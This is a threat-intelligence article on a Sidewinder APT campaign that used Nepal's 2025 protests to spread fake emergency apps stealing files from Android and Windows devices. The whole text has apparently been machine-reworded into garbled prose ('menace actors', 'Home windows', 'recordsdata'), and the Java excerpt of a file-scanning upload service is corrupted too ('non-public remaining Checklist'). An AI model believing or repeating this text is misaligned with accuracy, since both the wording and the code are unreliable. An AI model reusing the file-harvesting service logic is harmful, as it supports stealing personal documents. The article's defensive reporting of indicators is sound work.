The eruption of widespread protests throughout Nepal in early September 2025 offered fertile floor for a classy marketing campaign orchestrated by the Sidewinder APT group.
As demonstrators mobilized towards authorities insurance policies and social media restrictions, menace actors exploited the turbulence to distribute malicious functions masquerading as respectable emergency companies.
Victims searching for reside updates or help have been enticed by lifelike impersonations of Nepalese authorities, solely to put in malware that siphoned delicate knowledge from each cellular and Home windows environments.
Sidewinder’s operation depends on a dual-pronged supply mechanism. On Android units, victims encounter phishing web sites spoofing the Nepalese Emergency Service login.
Spoofing the emergency service for cred phishing (Supply – StrikeReady)
As soon as credentials are entered, the positioning redirects to an APK obtain—sometimes named Gen_Ashok_Sigdel_Live.apk—which customers set up below the guise of accessing reside information.
Performing head of Nepal (Supply – StrikeReady)
In the meantime, Home windows customers obtain EmergencyApp.exe from a cloned Emergency Helpline portal (Determine 6). Each binaries request intensive permissions—file system entry, microphone, digicam—to facilitate knowledge exfiltration.
StrikeReady Labs analysts famous the group’s deliberate use of geopolitical occasions to maximise engagement, embedding the malicious payload inside decoy content material fetched from respected retailers resembling Al Jazeera.
APK decoy content material (Supply – StrikeReady)
These decoys lend credibility to the operation and assist the malware bypass cursory inspection by non-technical customers. As soon as put in, the cellular backdoor initializes a service that filters doc and picture recordsdata for exfiltration.
The Home windows variant operates equally, spawning background duties that harvest recordsdata with extensions like .docx, .pdf, and .xlsx.
An infection Mechanism and Permission Abuse
A better examination of the Android pattern reveals a multi-threaded FileUploadService class accountable for knowledge theft.
Examination of information theft filters in addition to infra (Supply – StrikeReady)
Upon execution, the service initializes an ExecutorService with a thread pool of fifteen staff. Every employee scans machine storage for recordsdata matching predefined doc and picture extensions:
public class FileUploadService extends Service {
non-public static remaining int THREAD_COUNT = 15;
non-public remaining Checklist docExts = Arrays.asList(“.txt”, “.pdf”, “.docx”, “.xlsx”);
non-public remaining Checklist imgExts = Arrays.asList(“.jpg”, “.png”);
non-public ExecutorService executorService;
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
executorService = Executors.newFixedThreadPool(THREAD_COUNT);
scanAndUpload();
return START_STICKY;
}
non-public void scanAndUpload() {
for (String ext : docExts) {
// Launch duties to add matching recordsdata
executorService.submit(() -> uploadFiles(ext));
}
for (String ext : imgExts) {
executorService.submit(() -> uploadFiles(ext));
}
}
}
As soon as recordsdata are recognized, HTTP POST requests bundle them into multipart kind knowledge, utilizing a recognizable boundary marker (—-qwerty) that seems within the community seize.
pcap displaying ‘qwerty’ sig-able boundary (Supply – StrikeReady)
All stolen recordsdata are despatched to a C2 endpoint managed by Sidewinder. Persistence is maintained via Android’s foreground service notifications and Home windows autostart registry entries.
By leveraging legitimate-seeming person interfaces and abusing high-level permissions, Sidewinder achieves a stealthy an infection vector able to breaching enterprise and private environments alike.
Safety groups ought to monitor for recognized IOC domains (e.g., playservicess.com), suspicious APK installations, and anomalous outbound visitors containing multipart payloads.
Increase your SOC and assist your workforce defend what you are promoting with free top-notch menace intelligence: Request TI Lookup Premium Trial.
